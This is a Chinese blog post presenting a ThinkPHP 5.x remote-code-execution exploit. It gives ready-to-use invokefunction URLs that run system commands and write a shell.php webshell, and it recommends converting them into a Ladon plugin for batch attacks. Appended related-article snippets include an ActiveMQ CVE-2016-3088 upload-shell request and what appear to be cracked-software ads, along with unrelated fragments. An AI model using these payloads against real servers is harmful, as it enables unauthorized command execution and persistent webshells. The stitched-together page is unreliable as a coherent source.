Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit

前言

使用Exp生成器生成Ladon插件实战,ThinkPHP GetShell

漏洞环境

使用docker ThinkPHP 5.0.20

复现测试

Payload:

http://192.168.1.37:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

执行命令

http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写入文件

GetShell1

http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 111111>shell.php

GetShell2

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=URL编码内容

视频教程

通过EXP生成器将以上Payload转成DLL,使用Ladon即可批量利用,详情请观看视频教程

Video: K8Cscan ThinkPHP 5.x RCE Exploit

原文地址:https://www.cnblogs.com/k8gege/p/12307453.html

时间: 2024-11-09 09:24:59

Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit的相关文章

MySQL中文全文索引插件 mysqlcft 1.0.0 安装使用文档[原创]

[文章+程序 作者:张宴 本文版本:v1.0 最后修改:2008.07.01 转载请注明原文链接:http://blog.zyan.cc/post/356/] MySQL在高并发连接.数据库记录数较多的情况下,SELECT ... WHERE ... LIKE '%...%'的全文搜索方式不仅效率差,而且以通配符%和_开头作查询时,使用不到索引,需要全表扫描,对数据库的压力也很大.MySQL针对这一问题提供了一种全文索引解决方案,这不仅仅提高了性能和效率(因为MySQL对这些字段做了索引来优化搜

Ladon插件CVE-2016-3088 ActiveMQ GetShell Exploit

前言 使用Exp生成器生成Ladon插件实战,CVE-2016-3088 ActiveMQ GetShell 0x000 漏洞信息 漏洞编号: CVE-2016-3088 漏洞原理: ActiveMQ 中的 FileServer 服务允许用户通过 PUT/MOVE方法上传文件到指定目录 影响版本: Apache ActiveMQ 5.0.0 – 5.13.2 0x001 获取路径 PUT /fileserver/%20/%20 0x002 上传shell 上传和移动文件需登陆,默认帐密admin

横向受荷桩的设计软件 Oasys Alp 19.2.0.22

Oasys Alp 19.2.0.22 1CD 分析横向受力桩的土-结构相互作用的简易方法 当谈到横向受荷桩的设计软件,ALP使事情简单.这种横向受力桩分析软件模型的土壤剪切破坏和非线性的土壤行为,计算挠度下降的桩一起弯矩和剪力桩内. 选择选项,以适应任何打桩工程 桩的位移和位移 Acme CAD Converter 2016 8.7.5.1456 Portable 1CD  Bentley HAMMER CONNECT Edition 10.00.00.49 1CD  Bentley Wate

ThinkPHP V5.0 正式版发布

ThinkPHP5.0 正式版的发布,是团队中秋节送给PHP开发者最好的礼物!祝大家中秋快乐,事业顺利,用ThinkPHP开发更健康^_^ ThinkPHP5.0版本是一个颠覆和重构版本,官方团队历时十月,倾注了大量的时间和精力,采用全新的架构思想,引入了更多的PHP新特性,优化了核心,减少了依赖,实现了真正的惰性加载,支持composer,并针对API开发做了大量的优化,包括路由.日志.异常.模型.数据库.模板引擎和验证等模块都已经重构(基础教程qkxue.net),不适合原有3.2项目的升级

Oracle正式发布VirtualBox 5.0.22版本

甲骨文(Oracle)正式发布了VirtualBox 5.0.22版本,该开源和跨平台虚拟化软件的最新维护版本已经面向所有支持平台开放,引入了诸多新特性和功能改善推荐用户尽早完成升级.新版本在Linux Additions中引入了对即将发布的Linux 4.7内核的支持,此外还支持Red Hat Enterprise Linux 6.8系统. 事实上在VirtualBox 5.0.22版本中Linux Additions带来了一系列改善,例如更好的兼容某些32位guests.在hard gues

不受限制Freeform.Plus.v2015.0.41+lovius.Pro.v4.2.0.22+Design.v2015.1.1

不受限制Freeform.Plus.v2015.0.41+lovius.Pro.v4.2.0.22+Design.v2015.1.1 Geomagic.Freeform.Plus.v2015.0.41.X64多层图像数字建模系统 Geometric.Glovius.Pro.v4.2.0.22 Geomagic.Design.v2015.1.1    Freeform 是许多数字制造和设计过程的关键组成部分,而且它也可用作从最初设计到可生产的最终模 型的完整工作流程的单独来源.在 Freeform

thinkphp 5.0 模块设计

模块设计 5.0版本对模块的功能做了灵活设计,默认采用多模块的架构,并且支持单一模块设计,所有模块的命名空间均以app作为根命名空间(可配置更改). 目录结构 标准的应用和模块目录结构如下: ├─application 应用目录(可设置) │ ├─common 公共模块目录(可选) │ ├─common.php 公共函数文件 │ ├─route.php 路由配置文件 │ ├─database.php 数据库配置文件 │ ├─config.php 应用配置文件 │ ├─module1 模块1目录

thinkphp 5.0 命名空间

命名空间 命名空间 ThinkPHP5采用命名空间方式定义和自动加载类库文件,有效的解决了多模块和Composer类库之间的命名空间冲突问题,并且实现了更加高效的类库自动加载机制. 如果不清楚命名空间的基本概念,可以参考PHP手册:PHP命名空间 特别注意的是,如果你需要调用PHP内置的类库,或者第三方没有使用命名空间的类库,记得在实例化类库的时候加上 \,例如: // 错误的用法 $class = new stdClass(); $xml = new SimpleXmlElement($xml

Tomcat7.0.22在Windows下详细配置过程

转自 http://blog.csdn.net/yuan892173701/article/details/6916697 一.JDK1.7安装 1.下载jdk,下载地址:http://www.oracle.com/technetwork/java/javase/downloads/jdk-7u1-download-513651.html 2.添加系统环境变量,我的电脑->属性->高级->环境变量(如果添加的环境变量已经存在,点击"编辑"添加,否则点击"新建